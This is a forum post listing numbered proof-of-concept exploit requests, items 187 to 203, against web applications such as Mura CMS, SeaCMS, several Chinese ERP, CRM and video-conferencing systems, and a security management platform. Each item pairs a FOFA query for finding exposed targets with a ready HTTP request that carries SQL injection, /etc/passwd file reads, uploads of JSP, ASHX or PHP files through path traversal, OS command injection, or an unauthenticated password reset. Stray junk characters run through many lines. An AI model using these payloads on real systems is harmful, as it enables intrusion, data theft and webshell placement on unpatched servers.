Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8( Q2 y4 e. ~8 {7 l: W' h% B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 R! N, \: f# K* bAccept-Encoding: gzip, deflate
5 T. B5 x& `' r5 \3 NConnection: close. K; y' F p5 w8 ]1 ?
Content-Type: application/x-www-form-urlencoded4 @' S7 O+ U9 E4 t, H9 T
' T) a6 K$ s/ X/ G
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
1 h9 W; h d3 K" O! x; O
9 X: l& W+ b3 w3 `/ q/ x1 N+ u/ v
187. Mura CMS processAsyncObject SQL注入
. g4 x) ?4 \- t" ^( pCVE-2024-32640
" B- I5 ~1 Z. ^FOFA:"Mura CMS"& K2 |7 W6 a" P: o, }/ k
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
$ r8 `" f- ~% N5 E/ ]# H/ SHost: your-ip
+ {8 {( e+ t2 {# Z W# y7 o4 E/ HContent-Type: application/x-www-form-urlencoded
, L3 b( d- v6 Z$ _3 Y, k4 {2 e P
9 W& W- S2 s4 k
% c4 y# K9 ?6 oobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1! b# P- W( ?( b
, T$ u* m+ e5 e8 q$ M
" `7 B& J" Z6 `. A) e3 I8 f
188. 叁体-佳会视频会议 attachment 任意文件读取, _" G, `: r: H y2 `
version <= 3.9.7
* z! L9 O5 q* P) N+ \3 D6 g8 B0 T; _FOFA:body="/system/get_rtc_user_defined_info?site_id"6 N) w8 i% c/ `# K/ p
GET /attachment?file=/etc/passwd HTTP/1.1
4 g" B7 r3 ~/ A5 ~3 t# Y7 Y- R( uHost: your-ip2 x% n4 q8 u% Z6 ?, u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- D3 @: p/ i7 i5 t( @2 R. V y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, ?: I# M" [; n* L
Accept-Encoding: gzip, deflate
Q4 D8 Q" e; t5 M# VAccept-Language: zh-CN,zh;q=0.9,en;q=0.8& k4 b$ m3 d( T0 P% ^5 y5 y. Z! b4 ~
Connection: close- y" l! M! }% c% s4 {/ t
! K: `1 s2 n" y) E {
' q5 W [# ? j5 v$ h4 _1 k" ^189. 蓝网科技临床浏览系统 deleteStudy SQL注入
; f! Z! ~* q+ W$ Y6 K9 zFOFA:app="LANWON-临床浏览系统"
7 |8 j- H4 }/ z% `3 EGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! i7 X4 g8 {% j% X% v; {9 DHost: your-ip# Z' l2 i. W& E+ n
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# ~" m' p* p& W% E( e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. b; ^# D9 J+ b1 l0 M2 e# }
Accept-Encoding: gzip, deflate
. L. A0 W/ w: n9 C; M) fAccept-Language: zh-CN,zh;q=0.9' i! r/ A1 V6 E, f6 U5 Y
Connection: close" n% g3 B( }- i6 m
; Y' K. Y, g6 _5 h9 `
0 `- k- l& s# T190. 短视频矩阵营销系统 poihuoqu 任意文件读取
2 q+ T, B+ ]- F. l6 \9 KFOFA:title=="短视频矩阵营销系统"$ g7 w1 }# z& H0 g& O" B$ x
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
$ t2 f2 c$ u; oHost: your-ip
% h5 g( e- l% p5 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
- z5 z2 U1 C0 L+ O7 h5 H G1 \4 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) Q) A4 f4 v0 D L) xContent-Type: application/x-www-form-urlencoded
/ ?8 H1 t, B4 g; I$ u2 YAccept-Encoding: gzip, deflate
0 e2 E5 |8 m Z" D. L! _Accept-Language: zh-CN,zh;q=0.97 |5 J/ |# G8 S+ d; D: ~ b
9 i' b, w- R" [' I/ ~
poi=file:///etc/passwd) ^- v: r7 X8 G% a( J, |
1 F4 A+ j. N) R# w9 \" ^
7 Q" d. O2 {4 m1 `7 v. c
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
2 b3 v2 d7 p& Y2 a2 LFOFA:body="/CDGServer3/index.jsp"
0 ^! c) M# B+ t; I; R* H3 p' NPOST /CDGServer3/js/../NavigationAjax HTTP/1.17 C8 B% S8 A+ G! D0 J! `; s
Host: your-ip
1 o* K$ G; Z' I2 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* w8 I$ x8 A/ n- _5 w. ZContent-Type: application/x-www-form-urlencoded! M2 n6 w5 ~. \
4 o2 C' b# N) |3 K" G
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=/ o2 o- G. s% c1 v# o+ ~# a
% u0 c) r9 C& f6 j
$ v) L& H) [2 U2 X192. 富通天下外贸ERP UploadEmailAttr 任意文件上传6 a: Y/ I* l, s8 R s8 r; D; @+ K
FOFA:title="用户登录_富通天下外贸ERP"
, a! ~7 T y3 d) o$ K5 BPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1) J- H! P$ ~# ]1 h3 r
Host: your-ip
) }" z& L6 t7 ]: \% R. F. s1 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
6 }, q) b( s" b7 c! t9 {! ?6 bContent-Type: application/x-www-form-urlencoded# C# ~6 v: P3 f6 h5 a) y: w$ W
, d; l6 s; ?& J, h, j* w: M% A8 ~/ C, Q5 Q0 _
<% @ webhandler language="C#" class="AverageHandler" %>
5 u4 |$ b! n/ z- `using System;* s4 }- I" y7 Y! d* P. M
using System.Web;/ m9 R, H0 T- O3 k% i
public class AverageHandler : IHttpHandler
. z ~/ V* {7 r/ O) H% W{
% A( L' C0 M0 N+ i( Epublic bool IsReusable
: z4 h# c$ Y' y6 ?. h9 l0 b% v, ]{ get { return true; } }
8 k/ ]2 j, b! j; Z1 c1 S/ a5 i" ypublic void ProcessRequest(HttpContext ctx)
5 q, K+ k8 i3 y; f4 o{
& F& T* ?6 m+ q$ O, x7 W/ kctx.Response.Write("test");8 a+ o' I3 [9 m T
}
9 Y$ x) ?. W* ~}7 \9 W" |8 N7 Y8 ?; Z/ e
. F6 G @0 j) F
& N0 y( z/ d- t( @, T" i' n5 L
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
5 q$ \7 |4 E) W& |' W0 nFOFA:body="山石云鉴主机安全管理系统"
# o9 |+ B( @0 N$ ^GET /master/ajaxActions/getTokenAction.php HTTP/1.13 s6 v/ C* m+ ~3 I
Host:
. ]8 j A, p& v8 Z. s# Y9 qCookie: PHPSESSID=2333333333333;8 H7 ]) Y( y" O
Content-Type: application/x-www-form-urlencoded
% _5 }" v- \/ {/ L, e' r: \3 A& ?User-Agent: Mozilla/5.0
. n7 Y) U/ _% q% h4 e# ]8 l
1 W2 Q9 k& u1 y) U' ?* G6 n8 S% w8 h' t1 V& d5 B1 B
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.14 M9 w( N2 `3 Z& W: `- I
Host: q& R% Z' b7 o' [# t9 l4 { t
User-Agent: Mozilla/5.0
3 v Y9 u! U' Z5 ?* J- V) L! H2 uAccept-Encoding: gzip, deflate
* W0 Z! t7 G' h5 G8 \1 i4 b9 @" SAccept: */*' T& |/ n0 \, Y5 z4 e6 \' K
Connection: close# ~9 p+ N4 H- M# E$ G1 I
Cookie: PHPSESSID=2333333333333;
0 S( }4 u4 K& o/ IContent-Type: application/x-www-form-urlencoded
) K( |, ^; W5 G) K/ @& xContent-Length: 84, N/ L4 F3 V) T) t j0 ~
^ ~5 j9 l" Y0 c* Z0 Tparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'), u, K8 u; k, \. r7 Z, M, {3 t
2 f- d G' [3 f# x! ~8 S
$ Z9 a* r6 {, x- Y( x( @! J) V
GET /master/img/config HTTP/1.1
4 j3 K# h; W% n. zHost:0 R8 m/ r7 Z6 K" K8 g- x' y' X
User-Agent: Mozilla/5.0
" B- a. ]+ ~" A! d: t
$ t) W; Q% B i' Y! k8 P2 f5 S: l( E. @
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
2 L. S0 E; K( Q: ^FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
, u- O [5 h' K, j3 P4 N3 U Z: e6 x! c; u+ e
POST /servlet/uploadAttachmentServlet HTTP/1.1
& ?3 {* X6 w$ g' J1 R9 A( xHost: host
7 W: l1 ?+ Y! N) BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
5 s6 s q* D# [ U/ y8 T/ @5 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 C* }, m. x# M# yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( H+ q0 d" w$ }- r% P$ A9 }
Accept-Encoding: gzip, deflate
, n& S! f; F2 {% [Connection: close
6 d7 `* [2 S: D/ K. ~" R% oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk# n+ q( X" N4 l/ Q& Q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
/ p8 F- M$ m; F8 O! a' ^4 P' C5 U$ d5 e9 |8 W( a
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"+ w2 T1 Z5 W: l( R" C y2 ~3 n
Content-Type: text/plain [2 g9 A0 H! V: L/ k5 D
<% out.println("hello");%>/ f, g8 T1 C* w9 p# k4 A0 m
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
% f% D i2 a$ X3 [& y! N7 L5 uContent-Disposition: form-data; name="json"* i% a( a# U/ n0 |$ m
{"iq":{"query":{"UpdateType":"mail"}}}
& l; ]: |1 \7 M1 G3 G------WebKitFormBoundaryKNt0t4vBe8cX9rZk--. r0 \3 m5 \/ p! K0 K2 ^6 w0 p
4 H! F, n) U; Z) K# O9 b! d9 o* @% ]) d3 y4 p- {2 n% B" E
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行9 R9 R% L1 \- U. t- L8 J: V
FOFA:title=="飞鱼星企业级智能上网行为管理系统
4 g J$ O' o6 x3 ?6 G7 hPOST /send_order.cgi?parameter=operation HTTP/1.1+ F; i7 y M6 z- p
Host: 127.0.0.1
+ X' T* F9 ]/ q9 L8 y# x/ J& [Pragma: no-cache
8 Z( x$ ^. j; n% {. yCache-Control: no-cache
{6 G+ g4 S! R( XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 k& |/ s" b: j5 v; E7 Z
Accept: */*6 h( T1 s- \; Z* ]1 Z7 x" J7 ?! \
Accept-Encoding: gzip, deflate
: r! t! L8 A9 R* SAccept-Language: zh-CN,zh;q=0.98 D& T0 K% K2 D c
Connection: close
" Y) c) g6 i4 k, o& J0 f, zContent-Type: application/x-www-form-urlencoded6 e4 g; l9 I( D; d) ?7 y* G2 \8 t9 n
Content-Length: 68$ `% K/ V* m/ X! v, I( I& V7 \
; |$ O5 D/ X( a
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}5 U: u# g7 }/ S/ }
; _: p6 t) y' P; v& b+ h
, d" D* b( O7 [7 G$ ~7 m. u0 q
196. 河南省风速科技统一认证平台密码重置
2 ~' m6 o/ K. c( l* m' xFOFA:body="/cas/themes/zbvc/js/jquery.min.js"; j! C9 H. V4 Z X' f# A' k
POST /cas/userCtl/resetPasswordBySuper HTTP/1.11 ~& I0 G+ y" o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 \' Z4 s7 k$ ~0 EContent-Type: application/json;charset=UTF-8
2 F8 J7 k; b: V& m. |X-Requested-With: XMLHttpRequest: B& Z7 f- ?; y, x; \* o1 O
Host:6 J2 ?1 s% n; A2 N
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
& Z* P& B8 F; k# p, uContent-Length: 45) i1 X% R1 W. p, j3 |; P
Connection: close
& ^! @4 O* ^, p8 n8 Q2 F0 Q0 q
6 V: m6 [) ]$ ?$ v9 O. E{"xgh":"test","newPass":"test666","email":""}/ u! Z+ \- M, U$ ]2 C9 |) `
. _* i- ?0 B5 F# H8 ^' P. B
/ H6 ^% r( ?$ Q9 Q6 _6 l" _2 b/ W1 G+ D/ R3 t% }, a, f( c
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 H' s) U$ u$ g+ L% z" UFOFA:app="浙大恩特客户资源管理系统"
' W) M. t* C5 [6 b, ^3 jGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
& ?% {( J6 T! n4 G+ I& ^& k& UHost:
/ E v8 \' ]. v( \% x' cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36' u/ U# Q# x! G) l2 w( q
Accept-Encoding: gzip, deflate8 \ Q9 e5 t. N+ l
Connection: close
- ]" h8 X2 h( g; W# ]" P( D. ~* n2 W2 |, i; _ h$ w
: Z# B/ x* b4 P4 y& V
# D3 V }9 a9 D: W. Q198. 阿里云盘 WebDAV 命令注入/ w' u6 ~ _" x
CVE-2024-29640& i6 x. U( |. u! j }, b
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1- H1 H9 I$ T4 |! l
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf641 R7 v1 [5 b1 l" f1 _7 r
Accept: */*
# H9 O% ~; ^: ]& G5 r; x+ [# EAccept-Encoding: gzip, deflate
' _/ o0 S$ Y* t' f' X& \( XAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6* F: G) b; J' |/ y) X
Connection: close: n' w5 N# [. A. v
+ ?. a9 J; R+ X/ Y, O
- c6 G/ }4 `; M199. cockpit系统assetsmanager_upload接口 文件上传: B- N- A* e: n0 j! c+ k9 W
9 ^( S" }5 P' [1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
+ ?+ q, H }3 o" A4 O5 bGET /auth/login?to=/ HTTP/1.1
+ s+ Z$ m, a3 U H# h/ h f/ t: Q0 D
9 c1 F" S3 p7 Z1 V响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
i: U \7 I( A3 B- Q8 m1 Y$ p0 B9 Q# C( P+ r, t' y( h
2.使用刚才上一步获取到的jwt获取cookie:: a h3 k, w# v# y4 M- C
; B$ s) T0 S# ]* f' o5 |! g0 wPOST /auth/check HTTP/1.1! Q7 O( F! z7 r% R* l
Content-Type: application/json& x( N! T$ v9 }/ o# z) r6 ~
8 N# X4 v$ k% t+ N9 Y1 c/ n/ {
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
) b# p v- m: G% b; Q$ n/ ~7 h. ?, T% s
响应:200,返回值:$ N4 U7 Z3 }! Q% y
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/) O! N3 Q+ A/ ?* g' B
Fofa:title="Authenticate Please!") W3 K/ [3 s2 n& Z/ `1 y4 {2 |
POST /assetsmanager/upload HTTP/1.1' B' k, F( v7 {2 U* D- c0 z
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
2 z& |6 {" b) p/ X8 lCookie: mysession=95524f01e238bf51bb60d77ede3bea92
; _+ p- G8 ~8 n4 v- k; L8 E$ `1 W( n! L# p2 m
-----------------------------36D28FBc36bd6feE7Fb3( I# u3 ~, h5 V# Z3 ~
Content-Disposition: form-data; name="files[]"; filename="tttt.php": z# S! x' c. _9 g3 M9 U
Content-Type: text/php; }& ?& s% N; d: \: Z1 P0 K
% q' Y' x7 m( x0 K<?php echo "tttt";unlink(__FILE__);?>
" W3 o% u5 w' |- G% M-----------------------------36D28FBc36bd6feE7Fb3
) Z ~1 g/ ~( X; t7 aContent-Disposition: form-data; name="folder"1 W) N8 N' l2 A R1 Q
. g* C- U" e2 a& X- \8 h-----------------------------36D28FBc36bd6feE7Fb3--
7 H0 q2 N+ u9 B2 X3 I, C& G4 ~1 c/ j% Y% n, g6 F
% Q' G) f0 H. r
/storage/uploads/tttt.php
! Z9 [5 @' x1 O+ W7 t# M2 e" C. V( B. J/ w; D: Q7 O+ C2 J' a/ Q
200. SeaCMS海洋影视管理系统dmku SQL注入3 Z1 [8 K) a! i3 A' |
FOFA:app="海洋CMS"1 }# C- O7 M+ z9 S
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1+ l# C4 P9 B' C, w. f& B
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
9 o `: I7 h4 H. p- ^/ d; b# ^Upgrade-Insecure-Requests: 1
- W- @' ^" K: a1 B- ? `2 @; iCache-Control: max-age=0
8 h/ }* }. k5 q5 C2 W+ JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ Z4 g- G1 x; r$ T/ I/ ^; hAccept-Encoding: gzip, deflate2 |- \& h/ \9 u3 G
Accept-Language: zh-CN,zh;q=0.9# [9 T$ P' W8 B% P! h( l$ T9 k3 J
# A+ K5 p2 g; y, Q: _2 t+ M& k3 o. Q6 m8 i, N, W Y3 _
201. 方正全媒体新闻采编系统 binary SQL注入' t# W, \% g: h- L, @8 u* m5 F4 f
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
# Y% u4 F" `& ^# G2 VPOST /newsedit/newsplan/task/binary.do HTTP/1.18 p/ e$ \1 W6 {$ w# F$ U6 B( B
Content-Type: application/x-www-form-urlencoded% k6 c, E6 Y% j' H9 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, ^& Y+ `8 N+ N5 a$ n7 SAccept-Encoding: gzip, deflate
2 y$ w+ v2 t& F; s! Y* g* A! p9 W, _Accept-Language: zh-CN,zh;q=0.9
0 A0 s% q4 j) j: o. `, t1 g6 QConnection: close) F$ o% Z- j/ z: w0 c9 ]
D) V/ L |; t/ K! \7 z8 [3 bTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
7 n! h% A5 ?( P" J3 z z- K
5 M+ V5 _' S$ r n% ]6 s# M- N: b5 k* X# f- D- O; S
202. 微擎系统 AccountEdit任意文件上传( s- w0 y2 x1 |% \; V \ W
FOFA:body="/Widgets/WidgetCollection/"0 ^0 A8 k" X$ j
获取__VIEWSTATE和__EVENTVALIDATION值
4 x, d* [: Y T* kGET /User/AccountEdit.aspx HTTP/1.12 h9 l! P6 C- N' d
Host: 滑板人之家
" ~6 M" ~' J! ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31. @) d! B; n( e6 g7 r2 r
Content-Length: 0
5 u3 ~0 P8 Y( S' q8 r1 j5 x6 P) e
0 l' P2 Z# G$ a" \
替换__VIEWSTATE和__EVENTVALIDATION值. p" N$ c0 f- D3 Z
POST /User/AccountEdit.aspx HTTP/1.1
( L6 V1 X1 B) L7 YAccept-Encoding: gzip, deflate, br
) Y' U- N* |/ S$ ~( D' ]Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356875 e- d) k& ^; ?0 c! G1 m
Y: g8 C Q' c/ K# u$ l& A-----------------------------786435874t38587593865736587346567358735687/ `( f1 `* m: u: {7 a" G
Content-Disposition: form-data; name="__VIEWSTATE"% h% R* ^5 s! p, Q
6 b4 B! f2 p# D$ V9 E__VIEWSTATE
" g- `, z7 g( b: N I$ S' t; d9 k1 ]-----------------------------786435874t38587593865736587346567358735687
4 g8 ^" ]9 ~) s) {0 p% m. rContent-Disposition: form-data; name="__EVENTVALIDATION"
+ D9 J3 `7 x9 f3 I/ `! u! w
# M) A- L% C; Q__EVENTVALIDATION4 G$ A4 x/ r0 l; h7 O7 R1 R
-----------------------------786435874t38587593865736587346567358735687. O- u) p6 O/ c4 B! k/ O* @6 U
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
4 P' M# ?1 H: X5 c. l2 oContent-Type: text/plain
$ q; H+ i; X: h: t9 x2 U
/ f; Q3 T [( `0 B( mHello World!7 D @! w8 X6 ^( `1 s! D
-----------------------------786435874t38587593865736587346567358735687
# z+ G1 s' }4 y$ QContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
# c( O& C# k5 t/ ?8 h' y& ]/ Q9 S) [9 @4 Q: {0 Q) j3 w
上传图片
2 m2 v1 i+ }$ h; y {# Q+ B-----------------------------786435874t38587593865736587346567358735687" F/ y: r+ J. q& U# `1 q5 l) a
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
! N( k7 o- d7 @0 E* r& s) S* [! ?- u
1 V+ v& A8 h7 R5 k3 a-----------------------------786435874t38587593865736587346567358735687
! a7 v+ |+ v2 LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
2 [% O/ F4 N; o( L" k
& e+ q* x: r* s" r% W! M5 o
8 {( p6 _5 W5 Q6 e+ {+ K* O. p-----------------------------786435874t38587593865736587346567358735687--$ K" B! M& N3 a3 v* {
5 s$ t+ s: `2 k" a
, k: O) m! f9 W% P/_data/Uploads/1123.txt
' [! W3 Y1 O; n/ u9 k- r/ i
3 ?* ` e9 g& O; c6 S203. 红海云EHR PtFjk 文件上传2 G' n; \8 k/ R+ L
FOFA:body="RedseaPlatform"- ]& I) N9 _; M! I( z
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
2 @1 P3 Z* N, e1 T4 ZHost: x.x.x.x
+ K: P# ^! _/ R5 i. hAccept-Encoding: gzip
3 u& _/ Z3 P0 M' A0 D4 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, v! m# \6 w3 L% Q, \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4/ P; J1 H q/ w, K
Content-Length: 210
+ n- e# U$ @# y5 r- n+ M( c \3 ^ F* _! e0 o- C
------WebKitFormBoundaryt7WbDl1tXogoZys46 | T/ a1 y; V8 ~0 y- R. A5 u; n8 j
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
1 Q5 p# G- q4 s, q# wContent-Type:image/jpeg4 z2 k; T u6 H( g
, q. {) j& Y4 T% Q' R
<% out.print("hello,eHR");%>. L% u* {+ x$ n
------WebKitFormBoundaryt7WbDl1tXogoZys4--# b( @- X: r$ O3 a
/ @1 k$ S4 h, V ; ?" [1 w; \/ o$ d
4 k& q& G8 S3 p: d& e
0 o' S4 _7 x" S! ]7 R. K8 y; D
) k; h9 [3 b- m9 D4 f) a O. F" [: F. X+ X
|
发表于 2024-6-5 14:31:29
收藏
支持
反对